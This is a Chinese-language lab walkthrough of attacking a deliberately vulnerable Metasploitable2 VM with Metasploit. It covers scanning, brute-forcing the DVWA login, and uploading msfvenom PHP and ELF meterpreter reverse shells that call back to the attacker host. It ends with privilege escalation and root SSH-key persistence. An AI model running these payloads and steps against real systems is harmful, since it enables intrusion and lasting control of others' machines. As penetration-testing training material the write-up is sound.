靶机Metasploitable2:192.168.11.105
攻击机kail:192.168.11.106
一、创建工作空间
显示数据库未连接:
data:image/s3,"s3://crabby-images/13644/1364488a81b8ebf63cf6a5f90c706ab309f868fa" alt=""
使用
msfdb init
对数据进行初始化:
data:image/s3,"s3://crabby-images/d4067/d4067893a4ab1437e11a913aece60392f20d32e2" alt=""
db_status
显示数据库已连接。
使用命令
workspace -a 192.168.11.105
创建目标工作空间。
data:image/s3,"s3://crabby-images/65ce4/65ce414b31047793dbc68050bead060cf2062a47" alt=""
二、信息搜集
在msf中使用db_nmap 调用nmap对目标进行扫描:
data:image/s3,"s3://crabby-images/96ae0/96ae04b9ac8aecc1c5be6ad752f0eb100fdc00de" alt=""
保存在数据库中,
使用
services
查看保存结果:
data:image/s3,"s3://crabby-images/89ccc/89ccc21f6f4baf897644e8fbbb41959035a90928" alt=""
对于http端口,使用http_version搜索相关版本信息
使用命令
search http_version
查找相关信息:
data:image/s3,"s3://crabby-images/e5209/e520994de41a33fa99f691922d982b3e34340493" alt=""
使用
use
进入模块,
set
配置,
run
运行:
data:image/s3,"s3://crabby-images/ebbd8/ebbd8ae1a11a10e1f92d8845db2a4a0c2d7c4db6" alt=""
由结果可知,是PHP应用。
通过http运行的web程序进行渗透测试;对web程序,使用
dir_scanner模块对目录进行扫描。
data:image/s3,"s3://crabby-images/9caa2/9caa27056b81b2028f51e8cbc1ea57fd5cf1d2a9" alt=""
data:image/s3,"s3://crabby-images/2fca8/2fca8f20216807fb1ec7267ada46bfb199f1ba9b" alt=""
破解DVWA的用户密码:
nmap -p80 --script http-form-brute --script-args http-form-brute.path=/dvwa/login.php 192.168.11.105 -d
data:image/s3,"s3://crabby-images/103d0/103d001162e43c23619a1a355c7eb47388faf24e" alt=""
得到用户密码:
admin/password
基于dvwa文件上传漏洞
http://192.168.11.105/dvwa/vulnerabilities/upload/
data:image/s3,"s3://crabby-images/7dcc3/7dcc3b140967ee8e78342147ed2b9125ce9e4430" alt=""
使用命令:
msfvenom -l payload | grep php | grep meterpreter
筛选php后渗透模块的payload.
data:image/s3,"s3://crabby-images/4822c/4822c73c324a30a91c463e15677c7373bb04a37d" alt=""
选择php/meterpreter_reverse_tcp模块,使用命令:
msfvenom -p
php/meterpreter_reverse_tcp
lost=192.168.11.106 lport=4445 -o /home/shell.php指定payload模块设置监听地址及监听端口,并指定生成文件的地址。可以看到成功生成shell.php文件
data:image/s3,"s3://crabby-images/f7fe4/f7fe486f53c5994fc710946999b4886777590065" alt=""
上传shell.php文件:
data:image/s3,"s3://crabby-images/c2acc/c2acc8b595e364b16480a61989660d5d7c1a8c71" alt=""
报错: Your image was not uploaded,并不是如下图期望的结果:
data:image/s3,"s3://crabby-images/610bd/610bd7f02ed5dd4b4911a996092999049d68e8af" alt=""
参考:
DVWA实验-文件上传_Ping_Pig的博客-CSDN博客_your image was not uploaded.
data:image/s3,"s3://crabby-images/edf88/edf88bbe7b29b3f4ed63bb496ec08a42cb260d73" alt=""
三、打开msf设置监听
使用命令
use exploit/multi/handler
配置监听模块:
set payload php/meterpreter_reverse_tcp
(此处的payload一定要和上方生成的payload的是同一个模块)
set lhost 192.168.11.106
设置监听的ip
set lport 4445
设置监听端口
data:image/s3,"s3://crabby-images/ccffe/ccffea97de3a722b5c982139fddb5f2c24aaa33c" alt=""
浏览器上访问上传的shell.php文件
http://192.168.11.105/dvwa/hackable/uploads/shell.php
,msf会生成相关的会话:
data:image/s3,"s3://crabby-images/4f7be/4f7be4a27e760651b1f8d71bab0abf70f828308a" alt=""
由于生成的会话不稳定(会话被中断,执行run重新访问上传的shell.php即可),且
php meterpreter 不具有meterpreter完整功能,因此可以继续上传elf的meterpreter获取更多操作功能。
使用命令
msfvenom -l payload | grep linux | grep meterpreter
筛选Linux后渗透测试payload:
data:image/s3,"s3://crabby-images/82ada/82ada3d738af70008c3aa1ef3ab96d72bb85c21c" alt=""
使用命令:
msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.11.106 lport=4443 -f elf -o /home/shell.elf
生成payload:
data:image/s3,"s3://crabby-images/75e8b/75e8bfe1696013180502bb456ecea33ed04291b7" alt=""
使用刚才通过的上传php获得的meterpreter,上传生成的shell.elf
upload /home/shell.elf
上传成功:
data:image/s3,"s3://crabby-images/2aa53/2aa537a2e76de828ce72b2cd0987a1973218d063" alt=""
使用
dir
查看已经成功上传shell.elf,
且具备执行权限(若文件不具备执行权限则使用命令对文件添加权限)
data:image/s3,"s3://crabby-images/73ae9/73ae96c581e7d7762e341289381e0ef19d10f760" alt=""
data:image/s3,"s3://crabby-images/12b23/12b230b13d2fce9b94ac653770621808f3e09bd1" alt=""
再打开一个msf监听,监听上传的exe会话:
set payload linux/x86/meterpreter_reverse_tcp
set lhost 192.168.11.106
set lport 4443
data:image/s3,"s3://crabby-images/87477/87477a378a5218f461f56758e420651f620344f7" alt=""
在通过的上传php获得的meterpreter,使用命令
execute -f shell.elf
执行上传的exe:
data:image/s3,"s3://crabby-images/7e760/7e7601838d9e2c61cc376a65a5d83d4a0251366f" alt=""
可在新打开的msf中建立相关的会话:
data:image/s3,"s3://crabby-images/b0505/b0505404ed990d135c4d414de4b940d7ca9a8732" alt=""
此时获得权限认为web服务层面的权限
使用
getuid
查看当前会话权限,非root权限,需要提权:获取system权限
输入
bg
进行会话保存:
data:image/s3,"s3://crabby-images/a31a6/a31a6d5d84184d6b0220f52147c6bb0f490f3bc1" alt=""
使用命令
use post/multi/recon/local_exploit_suggester
配置相关参数检测是否存在
提权
模块:
data:image/s3,"s3://crabby-images/f6c84/f6c84fe9d078949eb16377338c7b177441bc074e" alt=""
使用提示的模块进行提权:获得system权限
data:image/s3,"s3://crabby-images/5b44a/5b44a46b88d5153076774425d1625891c5f9e908" alt=""
维持权限
使用 post/linux/manage目录下得sshkey_persistence模块实现对Linux服务的持续控制
use post/linux/manage/sshkey_persistence
show options
set session 4
(使用具有root权限的session)
run
执行后会生成私钥文件:
data:image/s3,"s3://crabby-images/d8c6f/d8c6f121ffa57ef87e0edafe3e0e56033d0c6a0d" alt=""
直接使用命令
ssh
-o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa
root@[目标ip] -i [私钥文件路径]
直接登录目标机器:若报错请参考
Solution to openssh-8.8-p1 update: no matching host key type found. Their offer: ssh-rsa :: /dev/ttyS3 — 回首向来萧瑟处 也无荒野也无灯
data:image/s3,"s3://crabby-images/4997f/4997f5609f4be1cd84c11e85628670cf515d06c2" alt=""
四、参考
Metasploit系列----未知目标测试_midsummer_woo的博客-CSDN博客
DVWA实验-文件上传_Ping_Pig的博客-CSDN博客_your image was not uploaded.
Solution to openssh-8.8-p1 update: no matching host key type found. Their offer: ssh-rsa :: /dev/ttyS3 — 回首向来萧瑟处 也无荒野也无灯